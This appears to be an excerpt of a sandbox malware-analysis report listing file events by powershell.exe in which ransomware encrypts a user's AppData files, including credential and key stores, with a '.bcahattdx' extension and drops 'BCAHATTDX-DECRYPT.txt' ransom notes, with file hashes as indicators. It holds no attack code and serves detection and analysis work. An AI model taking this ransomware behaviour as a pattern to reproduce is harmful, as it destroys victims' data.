SHA256:  ––
672
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\Cache\f_000003
––
MD5:  ––
SHA256:  ––
672
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\Cache\f_000002
––
MD5:  ––
SHA256:  ––
672
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\Cache\data_3
––
MD5:  ––
SHA256:  ––
672
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\Cache\data_3.bcahattdx
––
MD5:  ––
SHA256:  ––
672
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\Cache\data_2.bcahattdx
binary
MD5: 3b7d2fa579ba275d5856f3e83d000112
SHA256: d14641404c37f7ea0a37c36961c119689429391b89256ade8296bc00ab5c43ac
672
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\Cache\data_2
––
MD5:  ––
SHA256:  ––
672
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\Cache\data_0.bcahattdx
binary
MD5: 2f7419bbb8540ac34c6c4236a0065093
SHA256: 6d419eff68302395a6e5e90f714b278e66bf29743f4549106992ba28cb41d718
672
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\Cache\data_1.bcahattdx
binary
MD5: 400efee1e8f5169db8f5bb9193933a89
SHA256: 0fa77a2ef9c3d3cc66a6e0af54806b81365fc45c20b841d7d1977020535ce512
672
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\Cache\data_1
––
MD5:  ––
SHA256:  ––
672
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\Cache\data_0
––
MD5:  ––
SHA256:  ––
672
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Publisher\BCAHATTDX-DECRYPT.txt
text
MD5: ee078fe9377fcaeb5c548c88caf47f82
SHA256: f4f635036030b1f3decdabf1f875dce3491c833be1379b87bb68609093d45512
672
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\BCAHATTDX-DECRYPT.txt
text
MD5: ee078fe9377fcaeb5c548c88caf47f82
SHA256: f4f635036030b1f3decdabf1f875dce3491c833be1379b87bb68609093d45512
672
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Publisher Building Blocks\ContentStore.xml.bcahattdx
binary
MD5: 812b24624fa8ca97b57f03b54cf979f3
SHA256: 73a551e7b8c969a581baf75b6246ff90e47e5ab8af21f3a89e7f9e583454eabf
672
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Publisher Building Blocks\BCAHATTDX-DECRYPT.txt
text
MD5: ee078fe9377fcaeb5c548c88caf47f82
SHA256: f4f635036030b1f3decdabf1f875dce3491c833be1379b87bb68609093d45512
672
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Protect\S-1-5-21-1302019708-1500728564-335382590-1000\Preferred.bcahattdx
binary
MD5: 35ef99bf2aa76f524ec8abd8a94848c8
SHA256: a264dd4f4570615c72d9701d3eb5c9b90763efc3ad3c5ff800698244640b0193
672
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\Cache\BCAHATTDX-DECRYPT.txt
text
MD5: ee078fe9377fcaeb5c548c88caf47f82
SHA256: f4f635036030b1f3decdabf1f875dce3491c833be1379b87bb68609093d45512
672
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Protect\S-1-5-21-1302019708-1500728564-335382590-1000\54ba308a-6a9a-4e0e-b137-b89d3579498b.bcahattdx
binary
MD5: 8ab4f356b55b43a07cb41418fd01ce85
SHA256: 3bce174b4d7491d3e72b4bad1727ceb227a10f94ef47d22a03321f6a7b92c1e4
672
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Protect\S-1-5-21-1302019708-1500728564-335382590-1000\29fd2168-360f-422a-a685-e6961ea74ba8.bcahattdx
bs
MD5: d69b16dc66d25da16ca077234a1730ca
SHA256: c372d2ea7bdb072e4a0639550d2ec23591a03b7e753e7adfcab25140290946a6
672
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Signatures\BCAHATTDX-DECRYPT.txt
text
MD5: ee078fe9377fcaeb5c548c88caf47f82
SHA256: f4f635036030b1f3decdabf1f875dce3491c833be1379b87bb68609093d45512
672
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Protect\S-1-5-21-1302019708-1500728564-335382590-1000\Preferred
––
MD5:  ––
SHA256:  ––
672
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Protect\S-1-5-21-1302019708-1500728564-335382590-1000\54ba308a-6a9a-4e0e-b137-b89d3579498b
––
MD5:  ––
SHA256:  ––
672
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Publisher Building Blocks\ContentStore.xml
––
MD5:  ––
SHA256:  ––
672
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Outlook\test.xml.bcahattdx
binary
MD5: 64c3e953769a45f20fa0e1bf78b6222e
SHA256: 6921406f8dc90df888a1b15b519b14d54cce2cdecda6457be55dd21958b25758
672
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Proof\BCAHATTDX-DECRYPT.txt
text
MD5: ee078fe9377fcaeb5c548c88caf47f82
SHA256: f4f635036030b1f3decdabf1f875dce3491c833be1379b87bb68609093d45512
672
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Protect\BCAHATTDX-DECRYPT.txt
text
MD5: ee078fe9377fcaeb5c548c88caf47f82
SHA256: f4f635036030b1f3decdabf1f875dce3491c833be1379b87bb68609093d45512
672
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Protect\S-1-5-21-1302019708-1500728564-335382590-1000\BCAHATTDX-DECRYPT.txt
text
MD5: ee078fe9377fcaeb5c548c88caf47f82
SHA256: f4f635036030b1f3decdabf1f875dce3491c833be1379b87bb68609093d45512
672
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\PowerPoint\BCAHATTDX-DECRYPT.txt
text
MD5: ee078fe9377fcaeb5c548c88caf47f82
SHA256: f4f635036030b1f3decdabf1f875dce3491c833be1379b87bb68609093d45512
672
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Protect\CREDHIST.bcahattdx
binary
MD5: 49ef9d1318b229207a77d151ba49c869
SHA256: b92f6436645a254d0961fef0bb817d6bf779a479b173d75648229da0363ca370
672
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Outlook\test.srs.bcahattdx
binary
MD5: d1676a142d92f2f593ac4ebc19825728
SHA256: 15e2a1bce47942ad4b49b31728cc4ca3b0661c043f492f957ef72745ed88399e
672
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Protect\S-1-5-21-1302019708-1500728564-335382590-1000\29fd2168-360f-422a-a685-e6961ea74ba8
––
MD5:  ––
SHA256:  ––
672
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Outlook\test.srs
––
MD5:  ––
SHA256:  ––
672
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Protect\CREDHIST
––
MD5:  ––
SHA256:  ––
672
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Outlook\test.xml
––
MD5:  ––
SHA256:  ––
672
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Outlook\Outlook.xml.bcahattdx
binary
MD5: 3c15295b3081881fdb3cbd1b1e46f107
SHA256: 3f3f2d085005a4acd9e6e6d99bdd429c1f7a91061b3b6c7b83cdd9ec2426c91a
672
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\OneNote\14.0\Preferences.dat.bcahattdx
binary
MD5: 26f5e693e87d5caf37446bbd9ce7e62a
SHA256: aee23a5cfcae24ed3ba2e01cf0db056832df74798c00bb62c210521b2b47acbb
672
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Outlook\Outlook.srs.bcahattdx
binary
MD5: e530d97c970424c421b33e24aabb92ec
SHA256: f9e44545681dab52a093833762e1460c6379141183c1b5ca19be086ea0c9fd83
672
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Outlook\NoMail.xml.bcahattdx
binary
MD5: 6e53a66a9c4b5eca1325c77972bcab76
SHA256: 75d4830002d170def46918dce76709522046be4c7901a613bf190bef599c8e5a
672
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Outlook\BCAHATTDX-DECRYPT.txt
text
MD5: ee078fe9377fcaeb5c548c88caf47f82
SHA256: f4f635036030b1f3decdabf1f875dce3491c833be1379b87bb68609093d45512
672
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Outlook\NoMail.xml
––
MD5:  ––
SHA256:  ––
672
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Outlook\Outlook.xml
––
MD5:  ––
SHA256:  ––
672
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Outlook\Outlook.srs
––
MD5:  ––
SHA256:  ––
672
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\OneNote\BCAHATTDX-DECRYPT.txt
text
MD5: ee078fe9377fcaeb5c548c88caf47f82
SHA256: f4f635036030b1f3decdabf1f875dce3491c833be1379b87bb68609093d45512
672
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Office\BCAHATTDX-DECRYPT.txt
text
MD5: ee078fe9377fcaeb5c548c88caf47f82
SHA256: f4f635036030b1f3decdabf1f875dce3491c833be1379b87bb68609093d45512
672
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\OneNote\14.0\BCAHATTDX-DECRYPT.txt
text
MD5: ee078fe9377fcaeb5c548c88caf47f82
SHA256: f4f635036030b1f3decdabf1f875dce3491c833be1379b87bb68609093d45512
672
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Office\MSO1033.acl.bcahattdx
binary
MD5: e86b020fa2bf8c8378f1db524839c8e6
SHA256: a76d3ba004f9fc3059037f8a2b3531ed27b0e50994e0ff62cf5f1fc99162ae58
672
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\BCAHATTDX-DECRYPT.txt
text
MD5: ee078fe9377fcaeb5c548c88caf47f82
SHA256: f4f635036030b1f3decdabf1f875dce3491c833be1379b87bb68609093d45512
672
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\OneNote\14.0\Preferences.dat
––
MD5:  ––
SHA256:  ––
672
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Office\MSO1033.acl
––
MD5:  ––
SHA256:  ––
672
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\MMC\taskschd.bcahattdx
binary
MD5: b71dc3bf7c011230c0e8ff77939f6ef5
SHA256: 1fa2178e8c7f3a0e3ccdcf5a532680405f31dfa480e909a7cbaf35377e3f734c
672
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\ImplicitAppShortcuts\BCAHATTDX-DECRYPT.txt
text
MD5: ee078fe9377fcaeb5c548c88caf47f82
SHA256: f4f635036030b1f3decdabf1f875dce3491c833be1379b87bb68609093d45512
672
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\BCAHATTDX-DECRYPT.txt
text
MD5: ee078fe9377fcaeb5c548c88caf47f82
SHA256: f4f635036030b1f3decdabf1f875dce3491c833be1379b87bb68609093d45512
672
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\BCAHATTDX-DECRYPT.txt
text
MD5: ee078fe9377fcaeb5c548c88caf47f82
SHA256: f4f635036030b1f3decdabf1f875dce3491c833be1379b87bb68609093d45512
672
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Network\Connections\BCAHATTDX-DECRYPT.txt
text
MD5: ee078fe9377fcaeb5c548c88caf47f82
SHA256: f4f635036030b1f3decdabf1f875dce3491c833be1379b87bb68609093d45512
672
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\MMC\BCAHATTDX-DECRYPT.txt
text
MD5: ee078fe9377fcaeb5c548c88caf47f82
SHA256: f4f635036030b1f3decdabf1f875dce3491c833be1379b87bb68609093d45512
672
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Network\Connections\Pbk\BCAHATTDX-DECRYPT.txt
text
MD5: ee078fe9377fcaeb5c548c88caf47f82
SHA256: f4f635036030b1f3decdabf1f875dce3491c833be1379b87bb68609093d45512
672
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\BCAHATTDX-DECRYPT.txt
text
MD5: ee078fe9377fcaeb5c548c88caf47f82
SHA256: f4f635036030b1f3decdabf1f875dce3491c833be1379b87bb68609093d45512
672
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Network\BCAHATTDX-DECRYPT.txt
text
MD5: ee078fe9377fcaeb5c548c88caf47f82
SHA256: f4f635036030b1f3decdabf1f875dce3491c833be1379b87bb68609093d45512
672
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Network\Connections\Pbk\_hiddenPbk\BCAHATTDX-DECRYPT.txt
text
MD5: ee078fe9377fcaeb5c548c88caf47f82
SHA256: f4f635036030b1f3decdabf1f875dce3491c833be1379b87bb68609093d45512
672
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Internet Explorer\BCAHATTDX-DECRYPT.txt
text
MD5: ee078fe9377fcaeb5c548c88caf47f82
SHA256: f4f635036030b1f3decdabf1f875dce3491c833be1379b87bb68609093d45512
672
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\MMC\taskschd
––
MD5:  ––
SHA256:  ––
672
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Excel\XLSTART\BCAHATTDX-DECRYPT.txt
text
MD5: ee078fe9377fcaeb5c548c88caf47f82
SHA256: f4f635036030b1f3decdabf1f875dce3491c833be1379b87bb68609093d45512
672
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\HTML Help\BCAHATTDX-DECRYPT.txt
text
MD5: ee078fe9377fcaeb5c548c88caf47f82
SHA256: f4f635036030b1f3decdabf1f875dce3491c833be1379b87bb68609093d45512
672
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Document Building Blocks\1033\14\Built-In Building Blocks.dotx.bcahattdx
binary
MD5: 749562986dc15cd56ec072be7ca5ab17
SHA256: a096ca05984ebc811cd7628714d2953417ee2d44ec5c0d969d946f94eae565e9
672
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\HTML Help\hh.dat.bcahattdx
binary
MD5: b891d437988270304cbdfd0e16e11332
SHA256: c75560b6b52c676e830cfc85b31df7e949729f58164d3008b81ec393bd925295
672
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Excel\BCAHATTDX-DECRYPT.txt
text
MD5: ee078fe9377fcaeb5c548c88caf47f82
SHA256: f4f635036030b1f3decdabf1f875dce3491c833be1379b87bb68609093d45512
672
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\HTML Help\hh.dat
––
MD5:  ––
SHA256:  ––
672
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Document Building Blocks\1033\14\Built-In Building Blocks.dotx
––
MD5:  ––
SHA256:  ––
672
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Document Building Blocks\1033\BCAHATTDX-DECRYPT.txt
text
MD5: ee078fe9377fcaeb5c548c88caf47f82
SHA256: f4f635036030b1f3decdabf1f875dce3491c833be1379b87bb68609093d45512
672
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-1302019708-1500728564-335382590-1000\e3f86d7936454598ef98443d4fd3260d_90059c37-1320-41a4-b58d-2b75a9850d2f.bcahattdx
binary
MD5: 9bc3a78884a66684f8fce6aa4017be2b
SHA256: 81e17e9581d8f196f57be3d8a77bc3d6b61ee6c347b4008a499bf643f76141fd
672
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Document Building Blocks\BCAHATTDX-DECRYPT.txt
text
MD5: ee078fe9377fcaeb5c548c88caf47f82
SHA256: f4f635036030b1f3decdabf1f875dce3491c833be1379b87bb68609093d45512
672
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Document Building Blocks\1033\14\BCAHATTDX-DECRYPT.txt
text
MD5: ee078fe9377fcaeb5c548c88caf47f82
SHA256: f4f635036030b1f3decdabf1f875dce3491c833be1379b87bb68609093d45512
672
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-1302019708-1500728564-335382590-1000\e3f86d7936454598ef98443d4fd3260d_90059c37-1320-41a4-b58d-2b75a9850d2f
––
MD5:  ––
SHA256:  ––
672
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-1302019708-1500728564-335382590-1000\a551dda6b1d5ee0d0c4637af6c004413_90059c37-1320-41a4-b58d-2b75a9850d2f.bcahattdx
binary
MD5: ad2cd238b148991fe2217b4bc5526b3b
SHA256: 88d68c8af6d8ed108c562f2110858dbe0fe4acb99b5daa20c2e2c75ea7ec0887
672
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-1302019708-1500728564-335382590-1000\c43c9d3341c1ddc712bbe39db3c78fa5_90059c37-1320-41a4-b58d-2b75a9850d2f.bcahattdx
binary
MD5: d3ad8e996d78026fe87c6e8b2bee457d
SHA256: e4a1c41016a1f244933b6837ec2fe8d8ca73261ef2c017502c8e1294fe312d2b
672
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-1302019708-1500728564-335382590-1000\7be1242ebc44e45985bd1ffa382e997c_90059c37-1320-41a4-b58d-2b75a9850d2f.bcahattdx
binary
MD5: 0eb155173fe3d43efa564f97352ca454
SHA256: 42fdb7776da4c4a0d3875095781b73fdbd1a93cc60a8b4829f7fb3ecae7e35b6
672
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-1302019708-1500728564-335382590-1000\1f91d2d17ea675d4c2c3192e241743f9_90059c37-1320-41a4-b58d-2b75a9850d2f.bcahattdx
binary
MD5: d48e0756045a47d50c76461425f13852
SHA256: 3712586d09c2a08adae21abd89aaeb5fbbbdb7fdfc0ab905cf6c265aad1a30dd
672
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-1302019708-1500728564-335382590-1000\c43c9d3341c1ddc712bbe39db3c78fa5_90059c37-1320-41a4-b58d-2b75a9850d2f
––
MD5:  ––
SHA256:  ––
672
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-1302019708-1500728564-335382590-1000\a551dda6b1d5ee0d0c4637af6c004413_90059c37-1320-41a4-b58d-2b75a9850d2f
––
MD5:  ––
SHA256:  ––
672
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-1302019708-1500728564-335382590-1000\7be1242ebc44e45985bd1ffa382e997c_90059c37-1320-41a4-b58d-2b75a9850d2f
––
MD5:  ––
SHA256:  ––
672
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-1302019708-1500728564-335382590-1000\1f91d2d17ea675d4c2c3192e241743f9_90059c37-1320-41a4-b58d-2b75a9850d2f
––
MD5:  ––
SHA256:  ––
672
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\BCAHATTDX-DECRYPT.txt
text
MD5: ee078fe9377fcaeb5c548c88caf47f82
SHA256: f4f635036030b1f3decdabf1f875dce3491c833be1379b87bb68609093d45512
672
powershell.exe
C:\Users\admin\AppData\Roaming\FileZilla\queue.sqlite3.bcahattdx
binary
MD5: 966552c8f6fe099cac571985a4feebcd
SHA256: dcdc447d1bfa528ae2ed7faae2eb43487f25e8f90320c11891f388ae313633e7
672
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Credentials\BCAHATTDX-DECRYPT.txt
text
MD5: ee078fe9377fcaeb5c548c88caf47f82
SHA256: f4f635036030b1f3decdabf1f875dce3491c833be1379b87bb68609093d45512
672
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\AddIns\BCAHATTDX-DECRYPT.txt
text
MD5: ee078fe9377fcaeb5c548c88caf47f82
SHA256: f4f635036030b1f3decdabf1f875dce3491c833be1379b87bb68609093d45512
672
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-1302019708-1500728564-335382590-1000\0f5007522459c86e95ffcc62f32308f1_90059c37-1320-41a4-b58d-2b75a9850d2f.bcahattdx
binary
MD5: 3e6e7fe6aec15571ee976a9fd0f2ccd2
SHA256: 644f64fd3097271fd71a2fd56484ba031a49eca97e9383c9af34784bd5b15922
672
powershell.exe
C:\Users\admin\AppData\Roaming\Media Center Programs\BCAHATTDX-DECRYPT.txt
text
MD5: ee078fe9377fcaeb5c548c88caf47f82
SHA256: f4f635036030b1f3decdabf1f875dce3491c833be1379b87bb68609093d45512
672
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-1302019708-1500728564-335382590-1000\BCAHATTDX-DECRYPT.txt
text
MD5: ee078fe9377fcaeb5c548c88caf47f82
SHA256: f4f635036030b1f3decdabf1f875dce3491c833be1379b87bb68609093d45512
672
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Crypto\BCAHATTDX-DECRYPT.txt
text
MD5: ee078fe9377fcaeb5c548c88caf47f82
SHA256: f4f635036030b1f3decdabf1f875dce3491c833be1379b87bb68609093d45512
672
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Crypto\RSA\BCAHATTDX-DECRYPT.txt
text
MD5: ee078fe9377fcaeb5c548c88caf47f82
SHA256: f4f635036030b1f3decdabf1f875dce3491c833be1379b87bb68609093d45512
672
powershell.exe
C:\Users\admin\AppData\Roaming\Identities\BCAHATTDX-DECRYPT.txt
text
MD5: ee078fe9377fcaeb5c548c88caf47f82
SHA256: f4f635036030b1f3decdabf1f875dce3491c833be1379b87bb68609093d45512
672
powershell.exe
C:\Users\admin\AppData\Roaming\Identities\{E4CE17A7-FC47-4CD1-8FF6-45436C8F45DB}\BCAHATTDX-DECRYPT.txt
text
MD5: ee078fe9377fcaeb5c548c88caf47f82
SHA256: f4f635036030b1f3decdabf1f875dce3491c833be1379b87bb68609093d45512
672
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-1302019708-1500728564-335382590-1000\0f5007522459c86e95ffcc62f32308f1_90059c37-1320-41a4-b58d-2b75a9850d2f
––
MD5:  ––
SHA256:  ––
672
powershell.exe
C:\Users\admin\AppData\Roaming\FileZilla\queue.sqlite3
––
MD5:  ––
SHA256:  ––
672
powershell.exe
C:\Users\admin\AppData\Roaming\FileZilla\layout.xml.bcahattdx
binary
MD5: 2096291c6742d9f10e54a6597f1fcbc4
SHA256: 18ea2c86719922199aa53e2e4e944d7c4fc49787c7e2294330ce5f9894b78c36
672
powershell.exe
C:\Users\admin\AppData\Roaming\FileZilla\BCAHATTDX-DECRYPT.txt
text
MD5: ee078fe9377fcaeb5c548c88caf47f82
SHA256: f4f635036030b1f3decdabf1f875dce3491c833be1379b87bb68609093d45512
672
powershell.exe
C:\Users\admin\AppData\Roaming\FileZilla\filezilla.xml.bcahattdx
binary
MD5: c79a53c00d9010e9f5f93ea7cf54b43e
SHA256: 43cc9c2b5807323a718c548d70bcfced1e7e494429b2fdb89924e590b917c459
672
powershell.exe
C:\Users\admin\AppData\Roaming\Adobe\Sonar\Sonar1.0\sonar_policy.xml.bcahattdx
binary
MD5: 61d406a21b64acbc9ad7754d6d50fa12
SHA256: 901d0833d113355454f2ec4e7e16b2f5690f30da7651a58d4df4aee69798c51c
672
powershell.exe
C:\Users\admin\AppData\Roaming\FileZilla\layout.xml
––
MD5:  ––
SHA256:  ––
672
powershell.exe
C:\Users\admin\AppData\Roaming\FileZilla\filezilla.xml
––
MD5:  ––
SHA256:  ––
672
powershell.exe
C:\Users\admin\AppData\Roaming\Adobe\Sonar\Sonar1.0\sonar_policy.xml
––
MD5:  ––
SHA256:  ––
672
powershell.exe
C:\Users\admin\AppData\Roaming\Adobe\LogTransport2\LogTransport2.cfg.bcahattdx
binary
MD5: faf7c734c219bcb0febd5e087d924ed1
SHA256: e87b6063fa916a88df2cd42cc1d32a1472dc36cc2387c07ed64706563139d84f
672
powershell.exe
C:\Users\admin\AppData\Roaming\Adobe\Sonar\Sonar1.0\BCAHATTDX-DECRYPT.txt
text
MD5: ee078fe9377fcaeb5c548c88caf47f82
SHA256: f4f635036030b1f3decdabf1f875dce3491c833be1379b87bb68609093d45512
672
powershell.exe
C:\Users\admin\AppData\Roaming\Adobe\Sonar\BCAHATTDX-DECRYPT.txt
text
MD5: ee078fe9377fcaeb5c548c88caf47f82
SHA256: f4f635036030b1f3decdabf1f875dce3491c833be1379b87bb68609093d45512
672
powershell.exe
C:\Users\admin\AppData\Roaming\Adobe\LogTransport2\Logs\ulog_HeadlightsOptinProductFamily_HeadlightsOptinProduct_00000000-0000-0000-0000-000000000000_dc2ece58-8a8b-40bf-98c2-48039a3392bd.log.bcahattdx
binary
MD5: 7babc18bc3f6d28c151cf9af3875d720
SHA256: 4ba6b59b7885c713463ebb168218a098e1bfaf166c98679672a487c00b5016ef
672
powershell.exe
C:\Users\admin\AppData\Roaming\Adobe\LogTransport2\LogTransport2.cfg
––
MD5:  ––
SHA256:  ––
672
powershell.exe
C:\Users\admin\AppData\Roaming\Adobe\LogTransport2\Logs\ulog_HeadlightsOptinProductFamily_HeadlightsOptinProduct_00000000-0000-0000-0000-000000000000_dc2ece58-8a8b-40bf-98c2-48039a3392bd.log
––
MD5:  ––
SHA256:  ––
672
powershell.exe
C:\Users\admin\AppData\Roaming\Adobe\Flash Player\AssetCache\J7D4H966\BCAHATTDX-DECRYPT.txt
text
MD5: ee078fe9377fcaeb5c548c88caf47f82
SHA256: f4f635036030b1f3decdabf1f875dce3491c833be1379b87bb68609093d45512
672
powershell.exe
C:\Users\admin\AppData\Roaming\Adobe\LogTransport2\BCAHATTDX-DECRYPT.txt
text
MD5: ee078fe9377fcaeb5c548c88caf47f82
SHA256: f4f635036030b1f3decdabf1f875dce3491c833be1379b87bb68609093d45512
672
powershell.exe
C:\Users\admin\AppData\Roaming\Adobe\LogTransport2\Logs\ulog_AcroARM2_ARM2Update_2274f67c-7a7f-45e3-a23e-aa35d5b91e00_fea03e67-af51-4fcb-b57f-c238867edb9b_0.log.bcahattdx
binary
MD5: 2029dc1e147dfeac763017762cf26ddc
SHA256: 57c402d47f0bd8c8877299a1763dc814e0f217c15c9c75964ad1da7ea234e3d1
672
powershell.exe
C:\Users\admin\AppData\Roaming\Adobe\LogTransport2\Logs\BCAHATTDX-DECRYPT.txt
text
MD5: ee078fe9377fcaeb5c548c88caf47f82
SHA256: f4f635036030b1f3decdabf1f875dce3491c833be1379b87bb68609093d45512
672
powershell.exe
C:\Users\admin\AppData\Roaming\Adobe\Linguistics\BCAHATTDX-DECRYPT.txt
text
MD5: ee078fe9377fcaeb5c548c88caf47f82
SHA256: f4f635036030b1f3decdabf1f875dce3491c833be1379b87bb68609093d45512
672
powershell.exe
C:\Users\admin\AppData\Roaming\Adobe\Flash Player\NativeCache\BCAHATTDX-DECRYPT.txt
text
MD5: ee078fe9377fcaeb5c548c88caf47f82
SHA256: f4f635036030b1f3decdabf1f875dce3491c833be1379b87bb68609093d45512
672
powershell.exe
C:\Users\admin\AppData\Roaming\Adobe\LogTransport2\Logs\ulog_AcroARM2_Reader_2274f67c-7a7f-45e3-a23e-aa35d5b91e00_02f147fa-0489-4885-b993-ed9936fcacc0_0.rdy.bcahattdx
binary
MD5: af46be05567fa6f1589720dd411c5e90
SHA256: 5d41fe5981b4d2dbdb80b5a4e6b77f54e2f66bc7c2e1647ef48f7c802baa1294
672
powershell.exe
C:\Users\admin\AppData\Roaming\Adobe\Headlights\BCAHATTDX-DECRYPT.txt
text
MD5: ee078fe9377fcaeb5c548c88caf47f82
SHA256: f4f635036030b1f3decdabf1f875dce3491c833be1379b87bb68609093d45512
672
powershell.exe
C:\Users\admin\AppData\Roaming\Adobe\LogTransport2\Logs\ulog_AcroARM2_Reader_2274f67c-7a7f-45e3-a23e-aa35d5b91e00_02f147fa-0489-4885-b993-ed9936fcacc0_0.rdy
––
MD5:  ––
SHA256:  ––
672
powershell.exe
C:\Users\admin\AppData\Roaming\Adobe\LogTransport2\Logs\ulog_AcroARM2_ARM2Update_2274f67c-7a7f-45e3-a23e-aa35d5b91e00_fea03e67-af51-4fcb-b57f-c238867edb9b_0.log
––
MD5:  ––
SHA256:  ––
672
powershell.exe
C:\Users\admin\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\BCAHATTDX-DECRYPT.txt
text
MD5: ee078fe9377fcaeb5c548c88caf47f82
SHA256: f4f635036030b1f3decdabf1f875dce3491c833be1379b87bb68609093d45512
672
powershell.exe
C:\Users\admin\AppData\Roaming\Adobe\Acrobat\DC\Security\addressbook.acrodata.bcahattdx
binary
MD5: 9483c95d7446197a81a32ec57bbee797
SHA256: f554db1d547ee5cee2d570993e0ec0ea0f7b3a4e8e7f227deb29cd2a9a29cec9
672
powershell.exe
C:\Users\admin\AppData\Roaming\Adobe\Flash Player\BCAHATTDX-DECRYPT.txt
text
MD5: ee078fe9377fcaeb5c548c88caf47f82
SHA256: f4f635036030b1f3decdabf1f875dce3491c833be1379b87bb68609093d45512
672
powershell.exe
C:\Users\admin\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\0FDED5CEB68C302B1CDB2BDDD9D0000E76539CB0.crl.bcahattdx
binary
